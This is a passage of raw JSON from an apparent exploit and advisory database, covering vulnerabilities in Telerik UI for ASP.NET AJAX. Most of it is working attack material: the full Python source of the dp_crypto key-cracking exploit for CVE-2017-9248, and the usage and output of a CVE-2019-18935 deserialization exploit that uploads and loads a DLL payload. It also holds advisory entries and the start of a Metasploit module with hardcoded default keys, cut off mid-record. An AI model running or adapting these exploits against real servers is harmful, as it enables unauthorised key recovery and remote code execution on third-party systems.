len(sys.argv) == 4:\n mode_Encrypt_rauPostData()\nelif sys.argv[1] == \"-Q\" and len(sys.argv) == 4:\n mode_encrypt_rauPostData_Quiet()\nelif sys.argv[1] == \"-v\" and len(sys.argv) == 3:\n mode_version()\nelif sys.argv[1] == \"-p\" and len(sys.argv) == 5:\n mode_payload()\nelif sys.argv[1] == \"-P\" and len(sys.argv) == 6:\n mode_Post()\nelse:\n mode_help()", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:51", "description": "\nTelerik UI for ASP.NET AJAX 2012.3.1308 2017.1.118 - Encryption Keys Disclosure", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-24T00:00:00", "title": "Telerik UI for ASP.NET AJAX 2012.3.1308 2017.1.118 - Encryption Keys Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2018-01-24T00:00:00", "id": "EXPLOITPACK:C25B99FCFCE90C12FBCCCC43A0BEB5F4", "href": "", "sourceData": "# Exploit Title: Telerik UI for ASP.NET AJAX DialogHandler Dialog cracker\n# Filename: dp_crypto.py\n# Github: https://github.com/bao7uo/dp_crypto\n# Date: 2018-01-23\n\n# Exploit Author: Paul Taylor / Foregenix Ltd\n# Website: http://www.foregenix.com/blog\n\n# Version: Telerik UI for ASP.NET AJAX\n# CVE: CVE-2017-9248\n# Vendor Advisory: https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness\n\n# Tested on: Working on versions 2012.3.1308 thru 2017.1.118 (.NET 35, 40, 45)\n\n#!/usr/bin/python3\n\n# Author: Paul Taylor / Foregenix Ltd\n\n# https://github.com/bao7uo/dp_crypto/blob/master/dp_crypto.py\n\n# dp_crypto - CVE-2017-9248 exploit\n# Telerik.Web.UI.dll Cryptographic compromise\n\n# Warning - no cert warnings,\n# and verify = False in code below prevents verification\n\nimport sys\nimport base64\nimport requests\nimport re\nimport binascii\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nrequests_sent = 0\nchar_requests = 0\n\n\ndef get_result(plaintext, key, session, pad_chars):\n global requests_sent, char_requests\n\n url = sys.argv[2]\n base_pad = (len(key) % 4)\n base = '' if base_pad == 0 else pad_chars[0:4 - base_pad]\n dp_encrypted = base64.b64encode(\n (encrypt(plaintext, key) + base).encode()\n ).decode()\n request = requests.Request('GET', url + '?dp=' + dp_encrypted)\n request = request.prepare()\n response = session.send(request, verify=False)\n requests_sent += 1\n char_requests += 1\n\n match = re.search(\"(Error Message:)(.+\\n*.+)(</div>)\", response.text)\n return True \\\n if match is not None \\\n and match.group(2) == \"Index was outside the bounds of the array.\" \\\n else False\n\n\ndef test_keychar(keychar, found, session, pad_chars):\n base64chars = [\n \"A\", \"Q\", \"g\", \"w\", \"B\", \"R\", \"h\", \"x\", \"C\", \"S\", \"i\", \"y\",\n \"D\", \"T\", \"j\", \"z\", \"E\", \"U\", \"k\", \"0\", \"F\", \"V\", \"l\", \"1\",\n \"G\", \"W\", \"m\", \"2\", \"H\", \"X\", \"n\", \"3\", \"I\", \"Y\", \"o\", \"4\",\n \"J\", \"Z\", \"p\", \"5\", \"K\", \"a\", \"q\", \"6\", \"L\", \"b\", \"r\", \"7\",\n \"M\", \"c\", \"s\", \"8\", \"N\", \"d\", \"t\", \"9\", \"O\", \"e\", \"u\", \"+\",\n \"P\", \"f\", \"v\", \"/\"\n ]\n\n duff = False\n accuracy_thoroughness_threshold = sys.argv[5]\n for bc in range(int(accuracy_thoroughness_threshold)):\n # ^^ max is len(base64chars)\n sys.stdout.write(\"\\b\\b\" + base64chars[bc] + \"]\")\n sys.stdout.flush()\n if not get_result(\n base64chars[0] * len(found) + base64chars[bc],\n found + keychar, session, pad_chars\n ):\n duff = True\n break\n return False if duff else True\n\n\ndef encrypt(dpdata, key):\n encrypted = []\n k = 0\n for i in range(len(dpdata)):\n encrypted.append(chr(ord(dpdata[i]) ^ ord(key[k])))\n k = 0 if k >= len(key) - 1 else k + 1\n return ''.join(str(e) for e in encrypted)\n\n\ndef mode_decrypt():\n ciphertext = base64.b64decode(sys.argv[2].encode()).decode()\n key = sys.argv[3]\n print(base64.b64decode(encrypt(ciphertext, key)).decode())\n print(\"\")\n\n\ndef mode_encrypt():\n plaintext = sys.argv[2]\n key = sys.argv[3]\n\n plaintext = base64.b64encode(plaintext.encode()).decode()\n print(base64.b64encode(encrypt(plaintext, key).encode()).decode())\n print(\"\")\n\n\ndef test_keypos(key_charset, unprintable, found, session):\n pad_chars = ''\n for pad_char in range(256):\n pad_chars += chr(pad_char)\n\n for i in range(len(pad_chars)):\n for k in range(len(key_charset)):\n keychar = key_charset[k]\n sys.stdout.write(\"\\b\"*6)\n sys.stdout.write(\n (\n keychar\n if unprintable is False\n else '+'\n ) +\n \") [\" + (\n keychar\n if unprintable is False\n else '+'\n ) +\n \"]\"\n )\n sys.stdout.flush()\n if test_keychar(keychar, found, session, pad_chars[i] * 3):\n return keychar\n return False\n\n\ndef get_key(session):\n global char_requests\n found = ''\n unprintable = False\n\n key_length = sys.argv[3]\n key_charset = sys.argv[4]\n if key_charset == 'all':\n unprintable = True\n key_charset = ''\n for i in range(256):\n key_charset += chr(i)\n else:\n if key_charset == 'hex':\n key_charset = '01234567890ABCDEF'\n\n print(\"Attacking \" + sys.argv[2])\n print(\n \"to find key of length [\" +\n str(key_length) +\n \"] with accuracy threshold [\" +\n sys.argv[5] +\n \"]\"\n )\n print(\n \"using key charset [\" +\n (\n key_charset\n if unprintable is False\n else '- all ASCII -'\n ) +\n \"]\\n\"\n )\n for i in range(int(key_length)):\n pos_str = (\n str(i + 1)\n if i > 8\n else \"0\" + str(i + 1)\n )\n sys.stdout.write(\"Key position \" + pos_str + \": (------\")\n sys.stdout.flush()\n keychar = test_keypos(key_charset, unprintable, found, session)\n if keychar is not False:\n found = found + keychar\n sys.stdout.write(\n \"\\b\"*7 + \"{\" +\n (\n keychar\n if unprintable is False\n else '0x' + binascii.hexlify(keychar.encode()).decode()\n ) +\n \"} found with \" +\n str(char_requests) +\n \" requests, total so far: \" +\n str(requests_sent) +\n \"\\n\"\n )\n sys.stdout.flush()\n char_requests = 0\n else:\n sys.stdout.write(\"\\b\"*7 + \"Not found, quitting\\n\")\n sys.stdout.flush()\n break\n if keychar is not False:\n print(\"Found key: \" +\n (\n found\n if unprintable is False\n else \"(hex) \" + binascii.hexlify(found.encode()).decode()\n )\n )\n print(\"Total web requests: \" + str(requests_sent))\n return found\n\n\ndef mode_brutekey():\n session = requests.Session()\n found = get_key(session)\n\n if found == '':\n return\n else:\n urls = {}\n url_path = sys.argv[2]\n params = (\n '?DialogName=DocumentManager' +\n '&renderMode=2' +\n '&Skin=Default' +\n '&Title=Document%20Manager' +\n '&dpptn=' +\n '&isRtl=false' +\n '&dp='\n )\n versions = [\n '2007.1423', '2007.1521', '2007.1626', '2007.2918',\n '2007.21010', '2007.21107', '2007.31218', '2007.31314',\n '2007.31425', '2008.1415', '2008.1515', '2008.1619',\n '2008.2723', '2008.2826', '2008.21001', '2008.31105',\n '2008.31125', '2008.31314', '2009.1311', '2009.1402',\n '2009.1527', '2009.2701', '2009.2826', '2009.31103',\n '2009.31208', '2009.31314', '2010.1309', '2010.1415',\n '2010.1519', '2010.2713', '2010.2826', '2010.2929',\n '2010.31109', '2010.31215', '2010.31317', '2011.1315',\n '2011.1413', '2011.1519', '2011.2712', '2011.2915',\n '2011.31115', '2011.3.1305', '2012.1.215', '2012.1.411',\n '2012.2.607', '2012.2.724', '2012.2.912', '2012.3.1016',\n '2012.3.1205', '2012.3.1308', '2013.1.220', '2013.1.403',\n '2013.1.417', '2013.2.611', '2013.2.717', '2013.3.1015',\n '2013.3.1114', '2013.3.1324', '2014.1.225', '2014.1.403',\n '2014.2.618', '2014.2.724', '2014.3.1024', '2015.1.204',\n '2015.1.225', '2015.1.401', '2015.2.604', '2015.2.623',\n '2015.2.729', '2015.2.826', '2015.3.930', '2015.3.1111',\n '2016.1.113', '2016.1.225', '2016.2.504', '2016.2.607',\n '2016.3.914', '2016.3.1018', '2016.3.1027', '2017.1.118',\n '2017.1.228', '2017.2.503', '2017.2.621', '2017.2.711',\n '2017.3.913'\n ]\n\n plaintext1 = 'EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,'\n plaintext2_raw1 = 'Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version='\n plaintext2_raw3 = ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'\n plaintext3 = ';AllowMultipleSelection,False,3,False'\n\n for version in versions:\n plaintext2_raw2 = version\n plaintext2 = base64.b64encode(\n (plaintext2_raw1 +\n plaintext2_raw2 +\n plaintext2_raw3\n ).encode()\n ).decode()\n plaintext = plaintext1 + plaintext2 + plaintext3\n plaintext = base64.b64encode(\n plaintext.encode()\n ).decode()\n ciphertext = base64.b64encode(\n encrypt(\n plaintext,\n found\n ).encode()\n ).decode()\n full_url = url_path + params + ciphertext\n urls[version] = full_url\n\n found_valid_version = False\n for version in urls:\n url = urls[version]\n request = requests.Request('GET', url)\n request = request.prepare()\n response = session.send(request, verify=False)\n if response.status_code == 500:\n continue\n else:\n match = re.search(\n \"(Error Message:)(.+\\n*.+)(</div>)\",\n response.text\n )\n if match is None:\n print(version + \": \" + url)\n found_valid_version = True\n break\n\n if not found_valid_version:\n print(\"No valid version found\")\n\ndef mode_samples():\n print(\"Samples for testing decryption and encryption functions:\")\n print(\"-d ciphertext key\")\n print(\"-e plaintext key\")\n print(\"\")\n print(\"Key:\")\n print(\"DC50EEF37087D124578FD4E205EFACBE0D9C56607ADF522D\")\n print(\"\")\n print(\"Plaintext:\")\n print(\"EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,VGVsZXJpay5XZWIuVUkuRWRpdG9yLkRpYWxvZ0NvbnRyb2xzLkRvY3VtZW50TWFuYWdlckRpYWxvZywgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxNi4yLjUwNC40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0;AllowMultipleSelection,False,3,False\")\n print(\"\")\n print(\"Ciphertext:\")\n print(\"FhQAWBwoPl9maHYCJlx8YlZwQDAdYxRBYlgDNSJxFzZ9PUEWVlhgXHhxFipXdWR0HhV3WCECLkl7dmpOIGZnR3h0QCcmYwgHZXMLciMVMnN9AFJ0Z2EDWG4sPCpnZQMtHhRnWx8SFHBuaHZbEQJgAVdwbjwlcxNeVHY9ARgUOj9qF045eXBkSVMWEXFgX2QxHgRjSRESf1htY0BwHWZKTm9kTz8IcAwFZm0HNSNxBC5lA39zVH57Q2EJDndvYUUzCAVFRBw/KmJiZwAOCwB8WGxvciwlcgdaVH0XKiIudz98Ams6UWFjQ3oCPBJ4X0EzHXJwCRURMnVVXX5eJnZkcldgcioecxdeanMLNCAUdz98AWMrV354XHsFCTVjenh1HhdBfhwdLmVUd0BBHWZgc1RgQCoRBikEamY9ARgUOj9qF047eXJ/R3kFIzF4dkYJJnF7WCcCKgVuaGpHJgMHZWxvaikIcR9aUn0LKg0HAzZ/dGMzV3Fgc1QsfXVWAGQ9FXEMRSECEEZTdnpOJgJoRG9wbj8SfClFamBwLiMUFzZiKX8wVgRjQ3oCM3FjX14oIHJ3WCECLkl7dmpOIGZnR3h0QCcmYwgHZXMDMBEXNg9TdXcxVGEDZVVyEixUcUoDHRRNSh8WMUl7dWJfJnl8WHoHbnIgcxNLUlgDNRMELi1SAwAtVgd0WFMGIzVnX3Q3J3FgQwgGMQRjd35CHgJkXG8FbTUWWQNBUwcQNQwAOiRmPmtzY1psfmcVMBNvZUooJy5ZQgkuFENuZ0BBHgFgWG9aVDMlbBdCUgdxMxMELi1SAwAtY35aR20UcS5XZWc3Fi5zQyZ3E0B6c0BgFgBoTmJbUA0ncwMHfmMtJxdzLnRmKG8xUWB8aGIvBi1nSF5xEARBYyYDKmtSeGJWCXQHBmxaDRUhYwxLVX01CyByCHdnEHcUUXBGaHkVBhNjAmh1ExVRWycCCEFiXnptEgJaBmJZVHUeBR96ZlsLJxYGMjJpHFJyYnBGaGQZEhFjZUY+FxZvUScCCEZjXnpeCVtjAWFgSAQhcXBCfn0pCyAvFHZkL3RzeHMHdFNzIBR4A2g+HgZdZyATNmZ6aG5WE3drQ2wFCQEnBD12YVkDLRdzMj9pEl0MYXBGaVUHEi94XGA3HS5aRyAAd0JlXQltEgBnTmEHagAJX3BqY1gtCAwvBzJ/dH8wV3EPA2MZEjVRdV4zJgRjZB8SPl9uA2pHJgMGR2dafjUnBhBBfUw9ARgUOj9qFQR+\")\n print(\"\")\n\n\ndef mode_b64e():\n print(base64.b64encode(sys.argv[2].encode()).decode())\n print(\"\")\n\n\ndef mode_b64d():\n print(base64.b64decode(sys.argv[2].encode()).decode())\n print(\"\")\n\n\ndef mode_help():\n print(\"Usage:\")\n print(\"\")\n print(\"Decrypt a ciphertext: -d ciphertext key\")\n print(\"Encrypt a plaintext: -e plaintext key\")\n print(\"Bruteforce key/generate URL: -k url key_length key_charset accuracy\")\n print(\"Encode parameter to base64: -b plain_parameter\")\n print(\"Decode base64 parameter: -p encoded_parameter\")\n print(\"\")\n print(\"To test all ascii characters set key_charset to: all, \" +\n \"for upper case hex (e.g. machine key) set to hex.\")\n print(\"\")\n print(\"Maximum accuracy is out of 64 where 64 is the most accurate, \" +\n \"accuracy of 9 will usually suffice for a hex, but 21 or more \" +\n \"might be needed when testing all ascii characters.\")\n print(\"Increase the accuracy argument if no valid version is found.\")\n print(\"\")\n print(\"Examples to generate a valid file manager URL:\")\n print(\"./dp_crypto.py -k http://a/Telerik.Web.UI.DialogHandler.aspx 48 hex 9\")\n print(\"./dp_crypto.py -k http://a/Telerik.Web.UI.DialogHandler.aspx 48 all 21\")\n print(\"\")\n\n\nsys.stderr.write(\n \"\\ndp_crypto by Paul Taylor / Foregenix Ltd\\nCVE-2017-9248 - \" +\n \"Telerik.Web.UI.dll Cryptographic compromise\\n\\n\"\n )\n\nif len(sys.argv) < 2:\n mode_help()\n\nelif sys.argv[1] == \"-d\" and len(sys.argv) == 4:\n mode_decrypt()\nelif sys.argv[1] == \"-e\" and len(sys.argv) == 4:\n mode_encrypt()\nelif sys.argv[1] == \"-k\" and len(sys.argv) == 6:\n mode_brutekey()\nelif sys.argv[1] == \"-s\" and len(sys.argv) == 2:\n mode_samples()\nelif sys.argv[1] == \"-b\" and len(sys.argv) == 3:\n mode_b64e()\nelif sys.argv[1] == \"-p\" and len(sys.argv) == 3:\n mode_b64d()\nelse:\n mode_help()", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:40:44", "description": "\nTelerik UI - Remote Code Execution via Insecure Deserialization", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-18T00:00:00", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B", "href": "", "sourceData": "See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\n\nInstall\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\npython3 -m venv env\nsource env/bin/activate\npip3 install -r requirements.txt\n\nRequirements\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\n\nUsage\nCompile mixed mode assembly DLL payload\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\n\nbuild_dll.bat sleep.c\nUpload and load payload into application via insecure deserialization\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\n\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\n[*] Local payload name: sleep_2019121205271355_x86.dll\n[*] Destination folder: C:\\Windows\\Temp\n[*] Remote payload name: 1576142987.918625.dll\n\n{'fileInfo': {'ContentLength': 75264,\n 'ContentType': 'application/octet-stream',\n 'DateJson': '1970-01-01T00:00:00.000Z',\n 'FileName': '1576142987.918625.dll',\n 'Index': 0},\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\n 'Telerik.Web.UI, Version=<VERSION>, '\n 'Culture=neutral, '\n 'PublicKeyToken=<TOKEN>',\n 'TempFileName': '1576142987.918625.dll'}}\n\n[*] Triggering deserialization...\n\n<title>Runtime Error</title>\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\n<h2> <i>Runtime Error</i> </h2></span>\n...omitted for brevity...\n\n[*] Response time: 13.01 seconds\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\n\nThanks\n@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-09T19:56:16", "description": "An arbitrary file upload vulnerability exists in Telerik UI. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-13T00:00:00", "type": "checkpoint_advisories", "title": "Telerik UI Arbitrary File Upload (CVE-2017-11317; CVE-2017-11357)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357"], "modified": "2020-07-13T00:00:00", "id": "CPAI-2017-1057", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:19:29", "description": "A security bypass vulnerability exists in Telerik Web UI. Successful exploitation of this vulnerability can lead to cross-site scripting, arbitrary file uploads and downloads, leak of MachineKey and compromise of the ASP.NET ViewState on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-14T00:00:00", "type": "checkpoint_advisories", "title": "Telerik Web UI Information Disclosure (CVE-2017-9248)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2019-10-06T00:00:00", "id": "CPAI-2019-0396", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:12:16", "description": "A remote code execution vulnerability exists in Progress Telerik UI for Asp.Net Ajax. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-09T00:00:00", "type": "checkpoint_advisories", "title": "Progress Telerik UI Remote Code Execution (CVE-2019-18935)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-09-19T00:00:00", "id": "CPAI-2019-1914", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-22T05:20:05", "description": "This Metasploit module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running. This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. 2020.3.915).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "zdt", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935", "CVE-2017-11317"], "modified": "2020-10-21T00:00:00", "id": "1337DAY-ID-35085", "href": "https://0day.today/exploit/description/35085", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n SALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b\n # default keys per CVE-2017-11317\n DEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze\n DEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze\n CVE_2017_11317_REFERENCES = [\n ['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption\n ['URL', 'https://github.com/bao7uo/RAU_crypto'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'],\n ['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'],\n ].freeze\n CVE_2019_18935_REFERENCES = [\n ['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization\n ['URL', 'https://github.com/noperator/CVE-2019-18935'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'],\n ['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'],\n ['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'],\n ].freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization',\n 'Description' => %q{\n This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik\n UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET\n assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the\n cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once\n patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running.\n This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Paul Taylor', # (@bao7uo) Python PoCs\n 'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935\n 